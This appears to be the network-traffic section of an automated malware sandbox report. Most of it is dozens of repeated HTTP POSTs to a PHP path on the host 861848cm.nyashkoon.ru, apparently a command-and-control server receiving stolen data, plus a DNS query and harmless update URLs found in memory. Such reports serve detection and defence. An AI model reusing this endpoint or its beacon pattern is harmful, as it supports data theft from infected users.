                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1252Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1252Expect: 100-continueConnection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 | Host: 861848cm.nyashkoon.ru | Content-Length: 1276 | Expect: 100-continue | Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 | Host: 861848cm.nyashkoon.ru | Content-Length: 1260 | Expect: 100-continue | Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1252Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1252Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1252Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1260Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1008Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1248Expect: 100-continueConnection: Keep-Alive
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficDNS traffic detected: DNS query: 861848cm.nyashkoon.ru
                            Source: unknownHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CE18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                            Source: qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                            Source: qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CE18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CE18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CE4D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                            Source: qmgr.db.24.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
